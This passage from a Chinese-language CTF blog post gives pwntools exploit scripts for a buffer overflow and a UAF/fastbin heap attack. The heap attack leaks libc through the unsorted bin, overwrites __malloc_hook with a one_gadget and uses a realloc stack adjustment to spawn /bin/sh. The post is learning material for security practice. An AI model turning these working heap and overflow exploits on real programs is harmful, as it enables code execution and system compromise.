<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#exp.py</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context.log_level=<span class="hljs-string">&#x27;debug&#x27;</span><br><br><span class="hljs-comment"># p=process(&quot;./ciscn_2019_n_1&quot;)</span><br>p=remote(<span class="hljs-string">&quot;node4.buuoj.cn&quot;</span>,<span class="hljs-number">25151</span>)<br>payload=<span class="hljs-string">b&#x27;A&#x27;</span>*<span class="hljs-number">44</span>+p32(<span class="hljs-number">0x41348000</span>)<br>p.recvuntil(<span class="hljs-string">&quot;number.\n&quot;</span>)<br>p.sendline(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<img src="/2022/09/21/%E6%AF%8F%E6%97%A5C/image-20220918215707990.png" srcset="/img/loading.gif" lazyload class="" title="image-20220918215707990">

<h3 id="bjdctf-2020-babystack2"><a href="#bjdctf-2020-babystack2" class="headerlink" title="bjdctf_2020_babystack2"></a>bjdctf_2020_babystack2</h3><p>整形字符溢出，当整形被强转为unsigned类型，负数会变成正数，-1会变成256</p>
<h3 id="UAF-fastbin-attack"><a href="#UAF-fastbin-attack" class="headerlink" title="UAF+fastbin attack"></a>UAF+fastbin attack</h3><p>一道例题，没开pie，因此我们可以直接unsortedbin泄露main_arena的地址。</p>
<blockquote>
<p>回顾一下通过unsortedbin泄露基地址的原理。</p>
<p>申请一个0x100大小的堆块并释放进入unsortedbin，此时unsortedbin中的fd与bk指针就泄露出来：</p>
<img src="/2022/09/21/%E6%AF%8F%E6%97%A5C/image-20220922155503252.png" srcset="/img/loading.gif" lazyload class="" title="image-20220922155503252">

<p>而第一个堆块的fd与bk指针指向的是main_arena+88的真实地址。</p>
<img src="/2022/09/21/%E6%AF%8F%E6%97%A5C/image-20220922155437096.png" srcset="/img/loading.gif" lazyload class="" title="image-20220922155437096">

<p>main_arena就在malloc_hook的下方：</p>
<img src="/2022/09/21/%E6%AF%8F%E6%97%A5C/image-20220922155903548.png" srcset="/img/loading.gif" lazyload class="" title="image-20220922155903548">

<p>因此泄露出的地址相对于libc基地址的总偏移为 ：</p>
<p><strong>offset &#x3D; 88(main_arena)+0x10(malloc_hook)+0x3c4b10(malloc_hook在libc中的偏移)&#x3D;0x3c4b78</strong></p>
</blockquote>
<p>泄露出地址之后就可以在malloc_hook处做好堆布局，劫持fastbin的fd指针为malloc_hook，最后申请出的堆块数据区就是malloc_hook，最后填入one_gadget即可。</p>
<h4 id="使用realloc调整one-gadget栈帧"><a href="#使用realloc调整one-gadget栈帧" class="headerlink" title="使用realloc调整one_gadget栈帧"></a>使用realloc调整one_gadget栈帧</h4><p>实际情况中经常会遇到one_gadget不生效的情况，原因在于one_gadget的触发是需要条件的：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-number">0x45216</span>	execve(<span class="hljs-string">&quot;/bin/sh&quot;</span>, rsp+<span class="hljs-number">0x30</span>, environ)<br>constraints:<br>  rax == <span class="hljs-literal">NULL</span><br><br><span class="hljs-number">0x4526a</span>	execve(<span class="hljs-string">&quot;/bin/sh&quot;</span>, rsp+<span class="hljs-number">0x30</span>, environ)<br>constraints:<br>  [rsp+<span class="hljs-number">0x30</span>] == <span class="hljs-literal">NULL</span><br><br><span class="hljs-number">0xef6c4</span>	execve(<span class="hljs-string">&quot;/bin/sh&quot;</span>, rsp+<span class="hljs-number">0x50</span>, environ)<br>constraints:<br>  [rsp+<span class="hljs-number">0x50</span>] == <span class="hljs-literal">NULL</span><br><br><span class="hljs-number">0xf0567</span>	execve(<span class="hljs-string">&quot;/bin/sh&quot;</span>, rsp+<span class="hljs-number">0x70</span>, environ)<br>constraints:<br>  [rsp+<span class="hljs-number">0x70</span>] == <span class="hljs-literal">NULL</span><br></code></pre></td></tr></table></figure>

<p>假设我们使用第二个0x4526a，rsp+0x30的位置必须满足为null，实际调试的时候我们会发现：</p>
<p>下断点单步执行来到最后一步：</p>
<img src="/2022/09/21/%E6%AF%8F%E6%97%A5C/image-20220922161307516.png" srcset="/img/loading.gif" lazyload class="" title="image-20220922161307516">

<p>查看$rsp+0x30</p>
<img src="/2022/09/21/%E6%AF%8F%E6%97%A5C/image-20220922161353668.png" srcset="/img/loading.gif" lazyload class="" title="image-20220922161353668">

<p>可以看到并不满足空值的条件，但其下方有值为null的位置，那么如何能调整rsp的位置呢。</p>
<p>方法就是使用realloc，我们查看其汇编会发现:</p>
<img src="/2022/09/21/%E6%AF%8F%E6%97%A5C/image-20220922161703291.png" srcset="/img/loading.gif" lazyload class="" title="image-20220922161703291">

<p>有多次的push操作，还有下方的sub rsp,0x38会改变栈帧，那么如果我们在malloc_hook处先填入realloc，使其跳转到realloc的某条指令处，就能借助例如push去调整rsp的大小，地址每增加2字节就会少一次push，也就意味着原来的rsp+0x38等于现在的rsp+0x30，通过这种方式调整rsp的位置直到rsp+30&#x3D;null为止就可以触发one_gadget。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context.log_level=<span class="hljs-string">&#x27;debug&#x27;</span><br>l64     = <span class="hljs-keyword">lambda</span>                    :u64(io.recvuntil(<span class="hljs-string">&quot;\x7f&quot;</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>,<span class="hljs-string">&quot;\x00&quot;</span>))<br>l32     = <span class="hljs-keyword">lambda</span>                    :u32(io.recvuntil(<span class="hljs-string">&quot;\xf7&quot;</span>)[-<span class="hljs-number">4</span>:].ljust(<span class="hljs-number">4</span>,<span class="hljs-string">&quot;\x00&quot;</span>))<br>s       = <span class="hljs-keyword">lambda</span> data               :io.send(<span class="hljs-built_in">str</span>(data))<br>sa      = <span class="hljs-keyword">lambda</span> delim,data         :io.sendafter(delim, <span class="hljs-built_in">str</span>(data))<br>sl      = <span class="hljs-keyword">lambda</span> data               :io.sendline(<span class="hljs-built_in">str</span>(data))<br>sla     = <span class="hljs-keyword">lambda</span> delim,data         :io.sendlineafter(delim, <span class="hljs-built_in">str</span>(data))<br>r       = <span class="hljs-keyword">lambda</span> num=<span class="hljs-number">4096</span>           :io.recv(num)<br>ru      = <span class="hljs-keyword">lambda</span> delims, drop=<span class="hljs-literal">True</span>  :io.recvuntil(delims, drop)<br>uu64    = <span class="hljs-keyword">lambda</span> data               :u64(data.ljust(<span class="hljs-number">8</span>,<span class="hljs-string">&#x27;\0&#x27;</span>))<br>leak    = <span class="hljs-keyword">lambda</span> name,addr          :log.success(<span class="hljs-string">&#x27;&#123;&#125; = &#123;:#x&#125;&#x27;</span>.<span class="hljs-built_in">format</span>(name, addr))<br>libc = ELF(<span class="hljs-string">&#x27;./libc_64.so.6&#x27;</span>)<br>libc = ELF(<span class="hljs-string">&#x27;./libc-2.23.so&#x27;</span>)<br><br>io=process(<span class="hljs-string">&#x27;./heap&#x27;</span>)<br>elf = ELF(<span class="hljs-string">&#x27;./heap&#x27;</span>)<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">p</span>():<br>	gdb.attach(io)<br>	raw_input()<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">add</span>(<span class="hljs-params">index,size,content</span>):<br>    sla(<span class="hljs-string">&#x27;4:delete\n&#x27;</span>,<span class="hljs-number">1</span>)<br>    sla(<span class="hljs-string">&#x27;index:&#x27;</span>,index)<br>    sla(<span class="hljs-string">&#x27;size:&#x27;</span>,size)<br>    sla(<span class="hljs-string">&#x27;content:&#x27;</span>,content)<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">show</span>(<span class="hljs-params">index</span>):<br>	sla(<span class="hljs-string">&#x27;4:delete\n&#x27;</span>,<span class="hljs-number">2</span>)<br>	sla(<span class="hljs-string">&#x27;index:&#x27;</span>,index)<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">edit</span>(<span class="hljs-params">index,content</span>):<br>	sla(<span class="hljs-string">&#x27;4:delete\n&#x27;</span>,<span class="hljs-number">3</span>)<br>	sla(<span class="hljs-string">&#x27;index:&#x27;</span>,index)<br>	sl(content)<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">free</span>(<span class="hljs-params">index</span>):<br>	sla(<span class="hljs-string">&#x27;4:delete\n&#x27;</span>,<span class="hljs-number">4</span>)<br>	sla(<span class="hljs-string">&#x27;index:&#x27;</span>,index)<br><br>	<span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-string">0x45216	execve(&quot;/bin/sh&quot;, rsp+0x30, environ)</span><br><span class="hljs-string">constraints:</span><br><span class="hljs-string">  rax == NULL</span><br><span class="hljs-string"></span><br><span class="hljs-string">0x4526a	execve(&quot;/bin/sh&quot;, rsp+0x30, environ)</span><br><span class="hljs-string">constraints:</span><br><span class="hljs-string">  [rsp+0x30] == NULL</span><br><span class="hljs-string"></span><br><span class="hljs-string">0xef6c4	execve(&quot;/bin/sh&quot;, rsp+0x50, environ)</span><br><span class="hljs-string">constraints:</span><br><span class="hljs-string">  [rsp+0x50] == NULL</span><br><span class="hljs-string"></span><br><span class="hljs-string">0xf0567	execve(&quot;/bin/sh&quot;, rsp+0x70, environ)</span><br><span class="hljs-string">constraints:</span><br><span class="hljs-string">  [rsp+0x70] == NULL</span><br><span class="hljs-string"> &#x27;&#x27;&#x27;</span><br>add(<span class="hljs-number">0</span>,<span class="hljs-number">0x100</span>,<span class="hljs-string">&#x27;bbbb&#x27;</span>)<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1</span>,<span class="hljs-number">4</span>):<br>	add(i,<span class="hljs-number">0x60</span>,<span class="hljs-string">&#x27;aaaa&#x27;</span>)<br><span class="hljs-comment"># p()</span><br>free(<span class="hljs-number">0</span>)<br>show(<span class="hljs-number">0</span>)<br>leak=l64()<br>libc_base=leak-<span class="hljs-number">0x3c4b78</span><br>malloc=libc_base+libc.sym[<span class="hljs-string">&#x27;__malloc_hook&#x27;</span>]<br>realloc=libc_base+libc.sym[<span class="hljs-string">&#x27;__libc_realloc&#x27;</span>]<br>one_gadget=libc_base+<span class="hljs-number">0x4526a</span><br>log.success(<span class="hljs-string">&quot;malloc---&gt;%s&quot;</span>,<span class="hljs-built_in">hex</span>(malloc))<br><span class="hljs-comment">#泄露libc地址</span><br><br>target=malloc-<span class="hljs-number">0x23</span><br>free(<span class="hljs-number">1</span>)<br>edit(<span class="hljs-number">1</span>,p64(target))<br>add(<span class="hljs-number">4</span>,<span class="hljs-number">0x60</span>,<span class="hljs-string">&#x27;dddd&#x27;</span>)<br><span class="hljs-comment"># p()</span><br>add(<span class="hljs-number">5</span>,<span class="hljs-number">0x68</span>,<span class="hljs-string">&#x27;a&#x27;</span>*<span class="hljs-number">0x13</span>+p64(one_gadget)+p64(realloc+<span class="hljs-number">2</span>))<br><span class="hljs-comment"># p()</span><br>add(<span class="hljs-number">6</span>,<span class="hljs-number">0x20</span>,<span class="hljs-string">&#x27;/bin/sh&#x27;</span>)<br>io.interactive()<br><br></code></pre></td></tr></table></figure>


                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>每日C</div>
      <div>http://example.com/2022/09/21/每日C/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>springtime</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>September 21, 2022</div>
        </div>
      
      
      <div class="license-meta-item">
        <div>Licensed under</div>
        <div>
          
            
            
              <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
              <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                <i class="iconfont icon-by"></i>
              </span>
              </a>
            
          
        </div>
      </div>
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/09/12/ctf-RCEbypass%E7%AE%80%E5%8D%95%E6%80%BB%E7%BB%93/" title="ctf-RCEbypass简单总结">
                        <span class="hidden-mobile">ctf-RCEbypass简单总结</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;Table of Contents</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      headingSelector : CONFIG.toc.headingSelector || 'h1,h2,h3,h4,h5,h6',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      collapseDepth   : CONFIG.toc.collapseDepth || 0,
      scrollSmooth    : true,
      headingsOffset  : -boardTop
    });
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.10/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
